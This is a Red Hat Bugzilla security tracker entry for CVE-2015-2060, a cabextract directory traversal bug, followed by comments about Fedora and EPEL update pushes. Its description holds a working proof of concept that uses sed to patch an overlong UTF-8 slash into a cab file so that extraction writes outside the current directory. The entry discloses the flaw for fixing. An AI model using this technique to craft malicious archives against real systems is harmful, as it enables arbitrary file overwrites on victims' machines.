1193952 – (CVE-2015-2060) CVE-2015-2060 cabextract: directory traversal with UTF-8 symbols in filenames

Bug 1193952 (CVE-2015-2060) - CVE-2015-2060 cabextract: directory traversal with UTF-8 symbols in filenames

Summary: CVE-2015-2060 cabextract: directory traversal with UTF-8 symbols in filenames

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2015-2060
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	low
Severity:	low
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	1193955 1193956
Blocks:
TreeView+	depends on / blocked

Reported:	2015-02-18 15:42 UTC by Vasyl Kaigorodov
Modified:	2019-09-29 13:28 UTC (History)
CC List:	4 users (show)
Fixed In Version:
Doc Type:	Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed:	2016-06-10 20:52:21 UTC
Embargoed:

Attachments	(Terms of Use)

Description Vasyl Kaigorodov 2015-02-18 15:42:37 UTC

It was reported [1] that cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
  extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag.

The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

[1]: http://seclists.org/oss-sec/2015/q1/587

Comment 1 Vasyl Kaigorodov 2015-02-18 15:45:16 UTC

Created cabextract tracking bugs for this issue:

Affects: fedora-all [bug 1193955]
Affects: epel-all [bug 1193956]

Comment 2 Fedora Update System 2015-03-09 08:21:42 UTC

cabextract-1.5-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 3 Fedora Update System 2015-03-09 08:21:57 UTC

cabextract-1.5-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 4 Fedora Update System 2015-03-16 16:31:51 UTC

cabextract-1.5-1.el7 has been pushed to the Fedora EPEL 7 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 5 Fedora Update System 2015-03-16 16:32:16 UTC

cabextract-1.5-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 6 Fedora Update System 2015-04-09 16:57:17 UTC

cabextract-1.5-1.el5 has been pushed to the Fedora EPEL 5 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.